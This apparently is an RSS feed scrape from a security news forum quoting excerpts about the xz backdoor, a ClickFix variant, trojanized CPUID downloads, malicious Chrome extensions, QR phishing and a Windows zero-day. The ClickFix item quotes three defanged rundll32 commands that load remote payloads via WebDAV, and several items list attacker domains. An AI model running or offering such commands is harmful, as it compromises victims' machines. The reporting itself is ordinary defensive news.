https://www.geeks.fyi/ Thu, 04 Jun 2026 09:57:14 +0000 MyBB https://www.geeks.fyi/showthread.php?tid=21994 Sat, 23 May 2026 07:11:50 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21994 Quote:Google Cloud API keys may continue functioning for up to 23 minutes after deletion, exposing a significant security gap that could allow attackers to retain unauthorized access to cloud services even after credentials are revoked.

Google API Deleted Keys to Retain Access

Security researchers from Aikido, led by Joe Leon, discovered that deleted Google API keys do not immediately lose access as expected. Instead, revocation propagates gradually across Google’s distributed infrastructure, creating a “revocation window” during which the key remains intermittently valid.

In testing across 10 trials, researchers observed:

• Maximum revocation delay of approximately 23 minutes
  
• Minimum delay of around 8 minutes
  
• Median revocation time of roughly 16 minutes
  

During this window, authentication behavior was inconsistent. Some requests failed instantly, while others continued to succeed depending on which backend servers processed them. This inconsistency allows attackers with a leaked API key to continue making requests until all systems fully recognize the deletion.

Continue Reading... ]]> Quote:Google Cloud API keys may continue functioning for up to 23 minutes after deletion, exposing a significant security gap that could allow attackers to retain unauthorized access to cloud services even after credentials are revoked.

Google API Deleted Keys to Retain Access

Security researchers from Aikido, led by Joe Leon, discovered that deleted Google API keys do not immediately lose access as expected. Instead, revocation propagates gradually across Google’s distributed infrastructure, creating a “revocation window” during which the key remains intermittently valid.

In testing across 10 trials, researchers observed:

• Maximum revocation delay of approximately 23 minutes
  
• Minimum delay of around 8 minutes
  
• Median revocation time of roughly 16 minutes
  

During this window, authentication behavior was inconsistent. Some requests failed instantly, while others continued to succeed depending on which backend servers processed them. This inconsistency allows attackers with a leaked API key to continue making requests until all systems fully recognize the deletion.

Continue Reading... ]]> https://www.geeks.fyi/showthread.php?tid=21989 Thu, 21 May 2026 10:50:30 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21989 Quote:A critical vulnerability in ExifTool (CVE-2026-3102) allows attackers to compromise macOS systems through specially crafted malicious images. This flaw could enable arbitrary code execution when a vulnerable ExifTool instance processes a booby-trapped image file.
 
Kaspersky's Technical Breakdown​

• Vulnerability: A flaw within ExifTool (CVE-2026-3102) related to how it handles specific image metadata.
  
• TTPs: Attackers leverage malicious image files containing crafted metadata. When these images are processed by ExifTool, it triggers the vulnerability, leading to system compromise.
  
• Affected Systems: macOS systems running vulnerable versions of ExifTool.
  

Defense​

Ensure ExifTool is updated to the latest patched version to mitigate this vulnerability. Implement strict input validation and sanitize image files before processing them with ExifTool, especially from untrusted sources.

Continue Reading: How a single image takes control of a Mac ]]> Quote:A critical vulnerability in ExifTool (CVE-2026-3102) allows attackers to compromise macOS systems through specially crafted malicious images. This flaw could enable arbitrary code execution when a vulnerable ExifTool instance processes a booby-trapped image file.
 
Kaspersky's Technical Breakdown​

• Vulnerability: A flaw within ExifTool (CVE-2026-3102) related to how it handles specific image metadata.
  
• TTPs: Attackers leverage malicious image files containing crafted metadata. When these images are processed by ExifTool, it triggers the vulnerability, leading to system compromise.
  
• Affected Systems: macOS systems running vulnerable versions of ExifTool.
  

Defense​

Ensure ExifTool is updated to the latest patched version to mitigate this vulnerability. Implement strict input validation and sanitize image files before processing them with ExifTool, especially from untrusted sources.

Continue Reading: How a single image takes control of a Mac ]]> https://www.geeks.fyi/showthread.php?tid=21967 Wed, 13 May 2026 06:07:47 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21967 Quote:The European Commission is set to introduce a Tech Sovereignty Package later this month that could limit companies like Microsoft, Amazon, and Google from processing certain sensitive data for public sector organizations in Europe.

The restrictions are expected to cover financial, judicial, and health-related data, according to two unnamed Commission officials cited by CNBC. A Commission spokesperson described the initiative as "about Europe waking up and getting its act together."

What the EU’s Tech Sovereignty Package Would Cover

The restrictions, as described by sources within the Commission, are expected to target public organizations specifically. Private companies will still be free to select any cloud platform they prefer for handling their proprietary data. The main focus appears to be on US-based cloud providers, which currently dominate European public sector cloud workloads.

The Commission sees the package as a way to support European cloud providers and boost sovereign cloud options. One commissioner said the goal is to create opportunities for EU-based companies to grow and reach institutional users who are currently reliant on US cloud platforms.

Additionally, plans include reforming public procurement to offer more diverse cloud and AI service options for European public bodies.

Continue Reading... ]]> Quote:The European Commission is set to introduce a Tech Sovereignty Package later this month that could limit companies like Microsoft, Amazon, and Google from processing certain sensitive data for public sector organizations in Europe.

The restrictions are expected to cover financial, judicial, and health-related data, according to two unnamed Commission officials cited by CNBC. A Commission spokesperson described the initiative as "about Europe waking up and getting its act together."

What the EU’s Tech Sovereignty Package Would Cover

The restrictions, as described by sources within the Commission, are expected to target public organizations specifically. Private companies will still be free to select any cloud platform they prefer for handling their proprietary data. The main focus appears to be on US-based cloud providers, which currently dominate European public sector cloud workloads.

The Commission sees the package as a way to support European cloud providers and boost sovereign cloud options. One commissioner said the goal is to create opportunities for EU-based companies to grow and reach institutional users who are currently reliant on US cloud platforms.

Additionally, plans include reforming public procurement to offer more diverse cloud and AI service options for European public bodies.

Continue Reading... ]]> https://www.geeks.fyi/showthread.php?tid=21953 Tue, 12 May 2026 06:59:21 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21953 Quote:Attackers are currently running a malvertising campaign that uses Google Ads and legitimate shared chats on Claude.ai to spread macOS infostealer malware. The campaign was identified by Berk Albayrak, a security engineer at Trendyol Group, with BleepingComputer independently confirming a second active version using different infrastructure.

Users searching for "Claude mac download" might see sponsored Google search results directing them to Claude.ai, with the URL appearing legitimate. These links lead to publicly shared Claude chats that appear as official "Claude Code on Mac" installation guides supposedly from Apple Support. The chats instruct users to open Terminal and paste a command, which then silently downloads and executes malware.

At the time of reporting, two separate Claude shared chats involved in this attack were accessible publicly, each using different domains and payloads but sharing an identical social engineering approach.

How the Claude.ai Malvertising Attack Works

The command being pasted downloads a shell script that is encoded in base64 from domains controlled by attackers. One version, flagged by BleepingComputer, fetches a script called loader.sh from bernasibutuwqu2[.]com, while another, identified by Albayrak, uses customroofingcontractors[.]com.

This loader runs entirely in memory, which means it leaves minimal traces on the disk. The server delivers a uniquely obfuscated version of the payload for each request, a technique known as polymorphic delivery. This approach makes signature-based detection much more difficult.

Continue Reading... ]]> Quote:Attackers are currently running a malvertising campaign that uses Google Ads and legitimate shared chats on Claude.ai to spread macOS infostealer malware. The campaign was identified by Berk Albayrak, a security engineer at Trendyol Group, with BleepingComputer independently confirming a second active version using different infrastructure.

Users searching for "Claude mac download" might see sponsored Google search results directing them to Claude.ai, with the URL appearing legitimate. These links lead to publicly shared Claude chats that appear as official "Claude Code on Mac" installation guides supposedly from Apple Support. The chats instruct users to open Terminal and paste a command, which then silently downloads and executes malware.

At the time of reporting, two separate Claude shared chats involved in this attack were accessible publicly, each using different domains and payloads but sharing an identical social engineering approach.

How the Claude.ai Malvertising Attack Works

The command being pasted downloads a shell script that is encoded in base64 from domains controlled by attackers. One version, flagged by BleepingComputer, fetches a script called loader.sh from bernasibutuwqu2[.]com, while another, identified by Albayrak, uses customroofingcontractors[.]com.

This loader runs entirely in memory, which means it leaves minimal traces on the disk. The server delivers a uniquely obfuscated version of the payload for each request, a technique known as polymorphic delivery. This approach makes signature-based detection much more difficult.

Continue Reading... ]]> https://www.geeks.fyi/showthread.php?tid=21834 Thu, 16 Apr 2026 07:02:59 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21834 Quote:Microsoft has fixed a known issue that caused Windows Server 2019 and 2022 systems to automatically upgrade to Windows Server 2025 without user approval. The solution was confirmed in a Windows release health update on Tuesday, more than a year after the problem was first acknowledged in September 2024. "This issue is resolved and Microsoft has re-enabled the upgrade offer via the Windows Update settings panel," the company stated.

How the Windows Server Upgrade Bug Worked

In September 2024, administrators reported that servers had been automatically upgraded overnight to Windows Server 2025, in some cases to versions for which their organizations did not have licenses. Microsoft said part of the issue was due to third-party update management software that was not configured properly.

Software vendors disagreed, claiming the problem was caused by a procedural error on Microsoft's part, pointing to the speed of the release and how the update was classified. At the time, Microsoft did not offer a detailed explanation of the root cause and did not respond to press inquiries when the issue was first reported.

Continue Reading... ]]> Quote:Microsoft has fixed a known issue that caused Windows Server 2019 and 2022 systems to automatically upgrade to Windows Server 2025 without user approval. The solution was confirmed in a Windows release health update on Tuesday, more than a year after the problem was first acknowledged in September 2024. "This issue is resolved and Microsoft has re-enabled the upgrade offer via the Windows Update settings panel," the company stated.

How the Windows Server Upgrade Bug Worked

In September 2024, administrators reported that servers had been automatically upgraded overnight to Windows Server 2025, in some cases to versions for which their organizations did not have licenses. Microsoft said part of the issue was due to third-party update management software that was not configured properly.

Software vendors disagreed, claiming the problem was caused by a procedural error on Microsoft's part, pointing to the speed of the release and how the update was classified. At the time, Microsoft did not offer a detailed explanation of the root cause and did not respond to press inquiries when the issue was first reported.

Continue Reading... ]]> https://www.geeks.fyi/showthread.php?tid=21833 Thu, 16 Apr 2026 07:02:00 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21833 Quote:Security researchers at Socket have identified over 100 malicious extensions in the Chrome Web Store that are part of a coordinated campaign. These extensions steal Google OAuth2 Bearer tokens, deploy backdoors, and carry out ad fraud. At the time Socket published its report, all affected extensions were still available in the store. Google has not yet responded to requests for comment.

The extensions were published under five different publisher profiles across various categories, including Telegram sidebar clients, slot machine and Keno games, YouTube and TikTok enhancers, a text translation tool, and browser utilities. Socket found evidence in the code indicating the campaign is tied to a Russian malware-as-a-service operation.

What the Malicious Chrome Extensions Do

The campaign operates with a central backend hosted on a Contabo VPS, supported by multiple subdomains that handle session hijacking, identity collection, command execution, and monetization. The largest cluster involves 78 extensions that inject attacker-controlled HTML into the browser interface using the innerHTML property.

Continue Reading... ]]> Quote:Security researchers at Socket have identified over 100 malicious extensions in the Chrome Web Store that are part of a coordinated campaign. These extensions steal Google OAuth2 Bearer tokens, deploy backdoors, and carry out ad fraud. At the time Socket published its report, all affected extensions were still available in the store. Google has not yet responded to requests for comment.

The extensions were published under five different publisher profiles across various categories, including Telegram sidebar clients, slot machine and Keno games, YouTube and TikTok enhancers, a text translation tool, and browser utilities. Socket found evidence in the code indicating the campaign is tied to a Russian malware-as-a-service operation.

What the Malicious Chrome Extensions Do

The campaign operates with a central backend hosted on a Contabo VPS, supported by multiple subdomains that handle session hijacking, identity collection, command execution, and monetization. The largest cluster involves 78 extensions that inject attacker-controlled HTML into the browser interface using the innerHTML property.

Continue Reading... ]]> https://www.geeks.fyi/showthread.php?tid=21808 Mon, 13 Apr 2026 10:20:05 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21808 Quote:Hackers accessed a secondary API on the CPUID website between April 9 at 15:00 UTC and April 10 at around 10:00 UTC. During this time, the site served malicious download links instead of legitimate installers for several popular hardware monitoring utilities. CPUID has confirmed the breach and says the compromised API has been fixed. They are now serving clean versions of all affected tools.

Users who downloaded CPU-Z, HWMonitor, HWMonitor Pro, or PerfMonitor during the six-hour period may have received tampered versions. However, CPUID's original signed binaries were not altered.

What Malware Was Delivered Through the CPUID Downloads

The malicious downloads were funneled through Cloudflare R2 storage and delivered a fake HWiNFO installer named HWiNFO_Monitor_Setup, packaged with a Russian Inno Setup wrapper. According to Kaspersky's analysis, the trojanized versions included a legitimately signed executable along with a malicious DLL called CRYPTBASE.dll, which was used for DLL sideloading.

The malicious DLL performed anti-sandbox checks before connecting to a command-and-control server and executing a final payload identified as STX RAT. This remote access trojan has infostealer capabilities and has been documented by researchers at eSentire. The malware operated almost entirely in memory and used techniques to evade endpoint detection and antivirus software.

The four affected software versions were:

• CPU-Z version 2.19
  
• HWMonitor Pro version 1.57
  
• HWMonitor version 1.63
  
• PerfMonitor version 2.04.
  

Continue Reading... ]]> Quote:Hackers accessed a secondary API on the CPUID website between April 9 at 15:00 UTC and April 10 at around 10:00 UTC. During this time, the site served malicious download links instead of legitimate installers for several popular hardware monitoring utilities. CPUID has confirmed the breach and says the compromised API has been fixed. They are now serving clean versions of all affected tools.

Users who downloaded CPU-Z, HWMonitor, HWMonitor Pro, or PerfMonitor during the six-hour period may have received tampered versions. However, CPUID's original signed binaries were not altered.

What Malware Was Delivered Through the CPUID Downloads

The malicious downloads were funneled through Cloudflare R2 storage and delivered a fake HWiNFO installer named HWiNFO_Monitor_Setup, packaged with a Russian Inno Setup wrapper. According to Kaspersky's analysis, the trojanized versions included a legitimately signed executable along with a malicious DLL called CRYPTBASE.dll, which was used for DLL sideloading.

The malicious DLL performed anti-sandbox checks before connecting to a command-and-control server and executing a final payload identified as STX RAT. This remote access trojan has infostealer capabilities and has been documented by researchers at eSentire. The malware operated almost entirely in memory and used techniques to evade endpoint detection and antivirus software.

The four affected software versions were:

• CPU-Z version 2.19
  
• HWMonitor Pro version 1.57
  
• HWMonitor version 1.63
  
• PerfMonitor version 2.04.
  

Continue Reading... ]]> https://www.geeks.fyi/showthread.php?tid=21787 Wed, 08 Apr 2026 07:48:54 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21787 Quote:The next Windows Patch Day is just a week away and it is unclear whether it will include a fix for a recently disclosed 0-day vulnerability.

The new security vulnerability has been disclosed on GitHub, including proof of concept code to exploit the issue. However, there is no explanation how the issue works.

Well-known security researcher Will Dormann commented on the issue and confirmed that it is working. He admitted that it “may not be 100%” reliable though. It seems that frustration with MSRC, the Microsoft Security Research Center, and how it operates, was the reason for the public disclosure of the vulnerability. Whether that is true or not can’t be verified though.

So, what do we know about the vulnerability so far?

• What it is: “BlueHammer” is an unpatched zero-day Local Privilege Escalation (LPE) vulnerability affecting Microsoft Windows.
  
• Impact: It allows a local attacker with limited, low-level user access to escalate their permissions to SYSTEM or elevated administrator rights. This effectively grants the attacker full control over the compromised machine.
  
• Current Status: Microsoft has not yet released an official patch or mitigation, making it a true zero-day.
  

Continue Reading... ]]> Quote:The next Windows Patch Day is just a week away and it is unclear whether it will include a fix for a recently disclosed 0-day vulnerability.

The new security vulnerability has been disclosed on GitHub, including proof of concept code to exploit the issue. However, there is no explanation how the issue works.

Well-known security researcher Will Dormann commented on the issue and confirmed that it is working. He admitted that it “may not be 100%” reliable though. It seems that frustration with MSRC, the Microsoft Security Research Center, and how it operates, was the reason for the public disclosure of the vulnerability. Whether that is true or not can’t be verified though.

So, what do we know about the vulnerability so far?

• What it is: “BlueHammer” is an unpatched zero-day Local Privilege Escalation (LPE) vulnerability affecting Microsoft Windows.
  
• Impact: It allows a local attacker with limited, low-level user access to escalate their permissions to SYSTEM or elevated administrator rights. This effectively grants the attacker full control over the compromised machine.
  
• Current Status: Microsoft has not yet released an official patch or mitigation, making it a true zero-day.
  

Continue Reading... ]]> https://www.geeks.fyi/showthread.php?tid=21781 Mon, 06 Apr 2026 09:34:41 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21781 Quote:A phishing campaign is targeting residents across multiple US states with fake traffic violation notices delivered by text message, using embedded QR codes to direct victims to sites that steal personal and financial information. The campaign has been reported in New York, California, North Carolina, Illinois, Virginia, Texas, Connecticut, and New Jersey.

The texts include an image of a fabricated court notice rather than a plain link, a change from the toll and parking violation scam texts that circulated widely in 2025. The image format and embedded QR code are used to make the phishing infrastructure harder for automated security tools and researchers to detect and analyze.

How the Traffic Violation QR Code Scam Operates

The fake notices impersonate state courts, with one example claiming to be from the "Criminal Court of the City of New York." The message states that an unpaid parking or toll violation has entered formal enforcement and instructs the recipient to scan a QR code to settle the balance.

Scanning the QR code leads to an intermediary page requiring a CAPTCHA to proceed. Completing the CAPTCHA redirects to a second site impersonating a state DMV or related agency. In all examples reviewed by BleepingComputer, the stated outstanding balance is $6.99.

Phishing sites impersonating the New York DMV have used hostnames including "ny.gov-skd[.]org" and "ny.ofkhv[.]life."

Proceeding past the balance screen presents a form requesting name, address, phone number, email address, and credit card details. That data is collected by the attacker and can be used for financial fraud, identity theft, follow-on phishing, or sale to other threat actors.

Continue Reading... ]]> Quote:A phishing campaign is targeting residents across multiple US states with fake traffic violation notices delivered by text message, using embedded QR codes to direct victims to sites that steal personal and financial information. The campaign has been reported in New York, California, North Carolina, Illinois, Virginia, Texas, Connecticut, and New Jersey.

The texts include an image of a fabricated court notice rather than a plain link, a change from the toll and parking violation scam texts that circulated widely in 2025. The image format and embedded QR code are used to make the phishing infrastructure harder for automated security tools and researchers to detect and analyze.

How the Traffic Violation QR Code Scam Operates

The fake notices impersonate state courts, with one example claiming to be from the "Criminal Court of the City of New York." The message states that an unpaid parking or toll violation has entered formal enforcement and instructs the recipient to scan a QR code to settle the balance.

Scanning the QR code leads to an intermediary page requiring a CAPTCHA to proceed. Completing the CAPTCHA redirects to a second site impersonating a state DMV or related agency. In all examples reviewed by BleepingComputer, the stated outstanding balance is $6.99.

Phishing sites impersonating the New York DMV have used hostnames including "ny.gov-skd[.]org" and "ny.ofkhv[.]life."

Proceeding past the balance screen presents a form requesting name, address, phone number, email address, and credit card details. That data is collected by the attacker and can be used for financial fraud, identity theft, follow-on phishing, or sale to other threat actors.

Continue Reading... ]]> https://www.geeks.fyi/showthread.php?tid=21700 Tue, 31 Mar 2026 08:58:17 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21700 Quote:Google has officially moved its advanced ransomware detection and file restoration features for Google Drive out of beta, making them generally available to organizations globally.

Originally launched for beta testing in September 2025, these security enhancements are designed to minimize the destructive impact of malware attacks on both personal and corporate endpoints.



The Admin console setting for ransomware detection (Source: Google)The general availability release brings massive upgrades to Google’s threat detection engine.

Powered by an updated AI model, the system now identifies 14 times more infections than the previous beta version.



The Admin console setting for Drive file restoration  (Source: Google)It recognizes a much wider variety of modern ransomware encryption methods and detects malicious behavior significantly faster, providing comprehensive protection against rapidly evolving threat actors.

Continue Reading... ]]> Quote:Google has officially moved its advanced ransomware detection and file restoration features for Google Drive out of beta, making them generally available to organizations globally.

Originally launched for beta testing in September 2025, these security enhancements are designed to minimize the destructive impact of malware attacks on both personal and corporate endpoints.



The Admin console setting for ransomware detection (Source: Google)The general availability release brings massive upgrades to Google’s threat detection engine.

Powered by an updated AI model, the system now identifies 14 times more infections than the previous beta version.



The Admin console setting for Drive file restoration  (Source: Google)It recognizes a much wider variety of modern ransomware encryption methods and detects malicious behavior significantly faster, providing comprehensive protection against rapidly evolving threat actors.

Continue Reading... ]]> https://www.geeks.fyi/showthread.php?tid=21699 Tue, 31 Mar 2026 08:57:18 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21699 Quote:A new variant of the ClickFix attack technique that shifts execution away from commonly monitored tools like PowerShell and mshta, instead abusing native Windows components such as rundll32.exe and WebDAV.

This evolution allows attackers to bypass traditional script-based detection mechanisms, increasing the likelihood of a successful, stealthy compromise.

The attack begins similarly to earlier ClickFix campaigns. Victims are lured to a phishing website disguised as a CAPTCHA page, such as “healthybyhillary[.]com.”

The CyberProof Threat Research Team has observed a new variant of the ClickFix technique, where attackers manipulate the user into executing a malicious command on their own device through the Win + R shortcut. 


Phishing Website (Source : CyberProof).

The page instructs users to open the Windows Run dialog using “Win + R,” paste a command, and press Enter. This social engineering trick convinces users to execute malicious commands themselves.

Observed commands include:

• rundll32.exe \ser-fluxa[.]omnifree[.]in[.]net@80\verification.
  
• rundll32.exe \data-x7-sync.neurosync[.]in[.]net@80\verification.
  
• rundll32.exe \mer-forgea.sightup[.]in[.]net@80\verification.
  

These commands leverage the Windows WebDAV mini-redirector using the \server@port syntax. This allows remote files hosted over HTTP (port 80) to be accessed like local network shares.

Continue Reading... ]]> Quote:A new variant of the ClickFix attack technique that shifts execution away from commonly monitored tools like PowerShell and mshta, instead abusing native Windows components such as rundll32.exe and WebDAV.

This evolution allows attackers to bypass traditional script-based detection mechanisms, increasing the likelihood of a successful, stealthy compromise.

The attack begins similarly to earlier ClickFix campaigns. Victims are lured to a phishing website disguised as a CAPTCHA page, such as “healthybyhillary[.]com.”

The CyberProof Threat Research Team has observed a new variant of the ClickFix technique, where attackers manipulate the user into executing a malicious command on their own device through the Win + R shortcut. 


Phishing Website (Source : CyberProof).

The page instructs users to open the Windows Run dialog using “Win + R,” paste a command, and press Enter. This social engineering trick convinces users to execute malicious commands themselves.

Observed commands include:

• rundll32.exe \ser-fluxa[.]omnifree[.]in[.]net@80\verification.
  
• rundll32.exe \data-x7-sync.neurosync[.]in[.]net@80\verification.
  
• rundll32.exe \mer-forgea.sightup[.]in[.]net@80\verification.
  

These commands leverage the Windows WebDAV mini-redirector using the \server@port syntax. This allows remote files hosted over HTTP (port 80) to be accessed like local network shares.

Continue Reading... ]]> https://www.geeks.fyi/showthread.php?tid=21692 Fri, 27 Mar 2026 11:28:09 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21692 Quote:Red Hat has issued an urgent security alert regarding a highly sophisticated supply chain attack targeting the popular xz compression utility.

Cybersecurity researchers discovered malicious code embedded within recent versions of the xz libraries, which could potentially grant threat actors unauthorised remote access to affected Linux systems.

Technical Analysis of the Exploit

• The vulnerability is tracked as CVE-2024-3094.
  
• Compromised tools include the general-purpose data compression formats xz and xz-libs.
  
• Malicious code is actively present in versions 5.6.0 and 5.6.1.
  
• Security teams recommend reverting to the safe 5.4.x releases.
  
• Affected distributions currently include Fedora Rawhide, Fedora 40 Beta, Debian unstable (Sid), and openSUSE.
  
• The primary threat involves unauthorized remote system access via an SSH bypass.
  

The xz utility is a fundamental data compression format utilized across nearly every community and commercial Linux distribution to manage large file transfers.

The malicious injection specifically targets versions 5.6.0 and 5.6.1 of the libraries. Threat actors heavily obfuscated the payload, ensuring the complete exploit is only assembled within the official download package.

Continue Reading... ]]> Quote:Red Hat has issued an urgent security alert regarding a highly sophisticated supply chain attack targeting the popular xz compression utility.

Cybersecurity researchers discovered malicious code embedded within recent versions of the xz libraries, which could potentially grant threat actors unauthorised remote access to affected Linux systems.

Technical Analysis of the Exploit

• The vulnerability is tracked as CVE-2024-3094.
  
• Compromised tools include the general-purpose data compression formats xz and xz-libs.
  
• Malicious code is actively present in versions 5.6.0 and 5.6.1.
  
• Security teams recommend reverting to the safe 5.4.x releases.
  
• Affected distributions currently include Fedora Rawhide, Fedora 40 Beta, Debian unstable (Sid), and openSUSE.
  
• The primary threat involves unauthorized remote system access via an SSH bypass.
  

The xz utility is a fundamental data compression format utilized across nearly every community and commercial Linux distribution to manage large file transfers.

The malicious injection specifically targets versions 5.6.0 and 5.6.1 of the libraries. Threat actors heavily obfuscated the payload, ensuring the complete exploit is only assembled within the official download package.

Continue Reading... ]]> https://www.geeks.fyi/showthread.php?tid=21681 Mon, 23 Mar 2026 11:03:40 +0000 schreckdeividas]]> https://www.geeks.fyi/showthread.php?tid=21681 Quote:The internet you use every day could soon be dominated by artificial intelligence. Cloudflare CEO Matthew Prince says that AI bots may generate more traffic than humans within the next year or two, marking a major shift in how the web works.

Speaking about the current trends with TechCrunch, Prince said bot activity is growing rapidly as AI systems crawl and interact with websites at scale.

Before the rise of generative AI, bots were responsible for only 20% of internet traffic. Most of that traffic came from search engines like Google, and some malicious activity. Now, that number is climbing much faster.
Source----@digitaltrends]]> Quote:The internet you use every day could soon be dominated by artificial intelligence. Cloudflare CEO Matthew Prince says that AI bots may generate more traffic than humans within the next year or two, marking a major shift in how the web works.

Speaking about the current trends with TechCrunch, Prince said bot activity is growing rapidly as AI systems crawl and interact with websites at scale.

Before the rise of generative AI, bots were responsible for only 20% of internet traffic. Most of that traffic came from search engines like Google, and some malicious activity. Now, that number is climbing much faster.
Source----@digitaltrends]]> https://www.geeks.fyi/showthread.php?tid=21670 Thu, 19 Mar 2026 10:56:49 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21670 Quote:Google has taken down the Chrome extension "Save Image as Type" after security researchers uncovered it had been hijacked and altered to redirect user traffic for affiliate commission fraud. The extension had over a million users when it was removed.

The compromise was carried out by a group called Karma, which reportedly acquired the extension from its original developer sometime between November 13 and November 29, 2025, according to XDA Developers. By the end of November, new code had been inserted to intercept purchases made through retailers such as Amazon, Adidas, and Shein, enabling the attackers to collect affiliate commissions from transactions made by affected users.

What the Malicious Chrome Extension Code Did



The injected code secretly redirected user traffic in the background, without any obvious signs in the browser. This meant that users browsing and buying from supported retail sites had their sessions altered to credit Karma's affiliate accounts.

Despite this malicious activity, the extension continued to function normally as an image conversion tool, making it difficult to detect. Google took down the extension earlier in March 2026, but the harmful version had probably been active for several weeks before it was removed.

Continue Reading... ]]> Quote:Google has taken down the Chrome extension "Save Image as Type" after security researchers uncovered it had been hijacked and altered to redirect user traffic for affiliate commission fraud. The extension had over a million users when it was removed.

The compromise was carried out by a group called Karma, which reportedly acquired the extension from its original developer sometime between November 13 and November 29, 2025, according to XDA Developers. By the end of November, new code had been inserted to intercept purchases made through retailers such as Amazon, Adidas, and Shein, enabling the attackers to collect affiliate commissions from transactions made by affected users.

What the Malicious Chrome Extension Code Did



The injected code secretly redirected user traffic in the background, without any obvious signs in the browser. This meant that users browsing and buying from supported retail sites had their sessions altered to credit Karma's affiliate accounts.

Despite this malicious activity, the extension continued to function normally as an image conversion tool, making it difficult to detect. Google took down the extension earlier in March 2026, but the harmful version had probably been active for several weeks before it was removed.

Continue Reading... ]]> https://www.geeks.fyi/showthread.php?tid=21663 Tue, 17 Mar 2026 11:59:11 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21663 Quote:Threat actors were already abusing URL rewriting mechanisms in phishing campaigns to mask malicious domains.

URL rewriting is designed to protect users by replacing original links with security-vendor URLs that scan destinations at click time.

These rewritten links route traffic through the provider’s infrastructure so they can analyze the page in real time, block known malicious sites, and log user activity for administrators. In normal operation, this is a defensive layer that helps filter out obviously bad destinations.​

Threat actors, however, are turning this model on its head. By operating from compromised mailboxes that already use URL rewriting, they generate “pre-wrapped” safe links and then reuse those trusted-domain URLs in external phishing campaigns.

Example of an original phishing link (Source : LevelBlue

SpiderLabs).The end result is a phishing link that visually and technically appears to belong to a reputable security or productivity provider, even though it eventually leads to a credential-harvesting site.

From late 2024 into 2025, LevelBlue SpiderLabs observed a sharp rise in multi-layered URL rewriting chains, where attackers nest multiple already‑rewritten links together.

Continue Reading... ]]> Quote:Threat actors were already abusing URL rewriting mechanisms in phishing campaigns to mask malicious domains.

URL rewriting is designed to protect users by replacing original links with security-vendor URLs that scan destinations at click time.

These rewritten links route traffic through the provider’s infrastructure so they can analyze the page in real time, block known malicious sites, and log user activity for administrators. In normal operation, this is a defensive layer that helps filter out obviously bad destinations.​

Threat actors, however, are turning this model on its head. By operating from compromised mailboxes that already use URL rewriting, they generate “pre-wrapped” safe links and then reuse those trusted-domain URLs in external phishing campaigns.

Example of an original phishing link (Source : LevelBlue

SpiderLabs).The end result is a phishing link that visually and technically appears to belong to a reputable security or productivity provider, even though it eventually leads to a credential-harvesting site.

From late 2024 into 2025, LevelBlue SpiderLabs observed a sharp rise in multi-layered URL rewriting chains, where attackers nest multiple already‑rewritten links together.

Continue Reading... ]]>